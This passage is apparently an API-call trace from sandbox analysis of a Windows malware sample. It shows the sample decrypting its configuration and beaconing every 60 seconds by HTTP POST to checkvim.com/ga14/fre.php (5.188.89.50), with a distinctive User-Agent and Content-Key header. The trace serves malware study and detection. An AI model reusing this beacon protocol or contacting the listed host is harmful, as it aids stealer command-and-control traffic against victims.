dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0332.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.878] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0332.885] GetProcessHeap () returned 0x840000 [0332.885] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708d8 [0332.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.886] CryptImportKey (in: hProv=0x86f248, pbData=0x8708d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6f0) returned 1 [0332.886] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.886] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0332.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.887] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0332.887] GetProcessHeap () returned 0x840000 [0332.887] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708d8 | out: hHeap=0x840000) returned 1 [0332.888] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.888] CryptDecrypt (in: hKey=0x87e6f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0332.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.889] CryptDestroyKey (hKey=0x87e6f0) returned 1 [0332.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.890] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0332.890] GetProcessHeap () returned 0x840000 [0332.890] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0332.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0332.890] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0332.891] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0332.891] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0332.892] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0332.892] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0332.892] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0332.893] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0332.893] GetProcessHeap () returned 0x840000 [0332.893] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0332.893] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0332.893] GetProcessHeap () returned 0x840000 [0332.893] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0332.893] GetProcessHeap () returned 0x840000 [0332.893] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0332.893] GetProcessHeap () returned 0x840000 [0332.893] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0332.893] GetProcessHeap () returned 0x840000 [0332.893] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb00 [0332.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.894] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0332.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.899] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0332.906] GetProcessHeap () returned 0x840000 [0332.906] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0332.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.907] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e930) returned 1 [0332.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.908] CryptSetKeyParam (hKey=0x87e930, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0332.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.908] CryptSetKeyParam (hKey=0x87e930, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0332.909] GetProcessHeap () returned 0x840000 [0332.909] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0332.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.910] CryptDecrypt (in: hKey=0x87e930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb00, pdwDataLen=0x19f9a4 | out: pbData=0x87fb00, pdwDataLen=0x19f9a4) returned 1 [0332.910] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.910] CryptDestroyKey (hKey=0x87e930) returned 1 [0332.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.911] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0332.911] GetProcessHeap () returned 0x840000 [0332.911] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0332.912] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0332.912] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0332.912] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0332.913] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0332.913] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0332.914] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0332.914] GetProcessHeap () returned 0x840000 [0332.914] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0332.914] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0332.916] GetProcessHeap () returned 0x840000 [0332.916] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c68 [0332.916] socket (af=2, type=1, protocol=6) returned 0x5d0 [0332.917] connect (s=0x5d0, name=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0332.986] FreeAddrInfoW (pAddrInfo=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0332.986] GetProcessHeap () returned 0x840000 [0332.986] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f8a8 [0332.986] GetProcessHeap () returned 0x840000 [0332.986] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8885d0 [0332.987] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0332.987] wvsprintfA (in: param_1=0x8885d0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0332.987] GetProcessHeap () returned 0x840000 [0332.987] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0332.988] GetProcessHeap () returned 0x840000 [0332.988] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8885d0 | out: hHeap=0x840000) returned 1 [0332.988] GetProcessHeap () returned 0x840000 [0332.988] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fd40 [0332.988] GetProcessHeap () returned 0x840000 [0332.988] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8885d0 [0332.988] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0332.989] wvsprintfA (in: param_1=0x8885d0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0332.989] GetProcessHeap () returned 0x840000 [0332.989] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0332.989] GetProcessHeap () returned 0x840000 [0332.989] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8885d0 | out: hHeap=0x840000) returned 1 [0332.989] send (s=0x5d0, buf=0x873a58*, len=237, flags=0) returned 237 [0332.990] send (s=0x5d0, buf=0x87eb58*, len=159, flags=0) returned 159 [0332.990] GetProcessHeap () returned 0x840000 [0332.990] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0332.990] recv (in: s=0x5d0, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0333.343] GetProcessHeap () returned 0x840000 [0333.343] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0333.343] GetProcessHeap () returned 0x840000 [0333.343] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd40 | out: hHeap=0x840000) returned 1 [0333.343] GetProcessHeap () returned 0x840000 [0333.343] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0333.343] GetProcessHeap () returned 0x840000 [0333.343] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f8a8 | out: hHeap=0x840000) returned 1 [0333.343] closesocket (s=0x5d0) returned 0 [0333.344] GetProcessHeap () returned 0x840000 [0333.344] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c68 | out: hHeap=0x840000) returned 1 [0333.344] GetProcessHeap () returned 0x840000 [0333.344] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0333.344] GetProcessHeap () returned 0x840000 [0333.344] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb00 | out: hHeap=0x840000) returned 1 [0333.344] GetProcessHeap () returned 0x840000 [0333.344] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0333.344] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x320) returned 0x5d0 [0333.345] Sleep (dwMilliseconds=0xea60) [0333.362] GetProcessHeap () returned 0x840000 [0333.362] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0333.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0333.363] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0333.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0333.368] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0333.373] GetProcessHeap () returned 0x840000 [0333.373] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0333.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0333.374] CryptImportKey (in: hProv=0x86f248, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e930) returned 1 [0333.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0333.375] CryptSetKeyParam (hKey=0x87e930, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0333.376] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0333.376] CryptSetKeyParam (hKey=0x87e930, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0333.376] GetProcessHeap () returned 0x840000 [0333.376] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0333.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0333.377] CryptDecrypt (in: hKey=0x87e930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0333.378] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0333.379] CryptDestroyKey (hKey=0x87e930) returned 1 [0333.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0333.380] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0333.380] GetProcessHeap () returned 0x840000 [0333.380] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0333.381] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0333.381] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0333.382] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0333.382] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0333.383] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0333.384] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0333.384] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0333.384] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0333.385] GetProcessHeap () returned 0x840000 [0333.385] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871420 [0333.385] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0333.385] GetProcessHeap () returned 0x840000 [0333.385] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871420 | out: hHeap=0x840000) returned 1 [0333.385] GetProcessHeap () returned 0x840000 [0333.385] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0333.385] GetProcessHeap () returned 0x840000 [0333.385] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0333.385] GetProcessHeap () returned 0x840000 [0333.385] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f998 [0333.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0333.386] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0333.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0333.391] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fb50) returned 1 [0333.397] GetProcessHeap () returned 0x840000 [0333.397] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0333.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0333.398] CryptImportKey (in: hProv=0x86fb50, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3f0) returned 1 [0333.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0333.399] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0333.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0333.401] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0333.401] GetProcessHeap () returned 0x840000 [0333.401] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0333.402] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0333.402] CryptDecrypt (in: hKey=0x87e3f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f998, pdwDataLen=0x19f9a4 | out: pbData=0x87f998, pdwDataLen=0x19f9a4) returned 1 [0333.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0333.403] CryptDestroyKey (hKey=0x87e3f0) returned 1 [0333.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0333.404] CryptReleaseContext (hProv=0x86fb50, dwFlags=0x0) returned 1 [0333.404] GetProcessHeap () returned 0x840000 [0333.404] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0333.404] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0333.405] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0333.405] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0333.406] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0333.406] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0333.407] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0333.407] GetProcessHeap () returned 0x840000 [0333.407] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0333.407] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789e0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0333.408] GetProcessHeap () returned 0x840000 [0333.408] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c28 [0333.408] socket (af=2, type=1, protocol=6) returned 0x5d4 [0333.408] connect (s=0x5d4, name=0x8789e0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0333.481] FreeAddrInfoW (pAddrInfo=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789e0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0333.481] GetProcessHeap () returned 0x840000 [0333.481] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f820 [0333.481] GetProcessHeap () returned 0x840000 [0333.481] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8885d0 [0333.481] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0333.482] wvsprintfA (in: param_1=0x8885d0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0333.482] GetProcessHeap () returned 0x840000 [0333.482] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0333.482] GetProcessHeap () returned 0x840000 [0333.483] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8885d0 | out: hHeap=0x840000) returned 1 [0333.483] GetProcessHeap () returned 0x840000 [0333.483] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb00 [0333.483] GetProcessHeap () returned 0x840000 [0333.483] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8885d0 [0333.484] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0333.484] wvsprintfA (in: param_1=0x8885d0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0333.484] GetProcessHeap () returned 0x840000 [0333.484] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0333.484] GetProcessHeap () returned 0x840000 [0333.484] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8885d0 | out: hHeap=0x840000) returned 1 [0333.485] send (s=0x5d4, buf=0x873a58*, len=237, flags=0) returned 237 [0333.485] send (s=0x5d4, buf=0x87eb58*, len=159, flags=0) returned 159 [0333.485] GetProcessHeap () returned 0x840000 [0333.485] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0333.485] recv (in: s=0x5d4, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0333.858] GetProcessHeap () returned 0x840000 [0333.859] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0333.859] GetProcessHeap () returned 0x840000 [0333.859] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb00 | out: hHeap=0x840000) returned 1 [0333.859] GetProcessHeap () returned 0x840000 [0333.859] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0333.859] GetProcessHeap () returned 0x840000 [0333.859] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f820 | out: hHeap=0x840000) returned 1 [0333.859] closesocket (s=0x5d4) returned 0 [0333.859] GetProcessHeap () returned 0x840000 [0333.859] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c28 | out: hHeap=0x840000) returned 1 [0333.859] GetProcessHeap () returned 0x840000 [0333.860] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0333.860] GetProcessHeap () returned 0x840000 [0333.860] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0333.860] GetProcessHeap () returned 0x840000 [0333.860] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0333.860] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1074) returned 0x5d4 [0333.864] Sleep (dwMilliseconds=0xea60) [0333.883] GetProcessHeap () returned 0x840000 [0333.883] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc68 [0333.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0333.884] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0333.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0333.889] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0333.894] GetProcessHeap () returned 0x840000 [0333.895] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0333.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0333.895] CryptImportKey (in: hProv=0x86ff90, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e8f0) returned 1 [0333.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0333.896] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0333.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0333.897] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0333.897] GetProcessHeap () returned 0x840000 [0333.897] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0333.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0333.898] CryptDecrypt (in: hKey=0x87e8f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc68, pdwDataLen=0x19f9a4 | out: pbData=0x87fc68, pdwDataLen=0x19f9a4) returned 1 [0333.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0333.898] CryptDestroyKey (hKey=0x87e8f0) returned 1 [0333.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0333.899] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 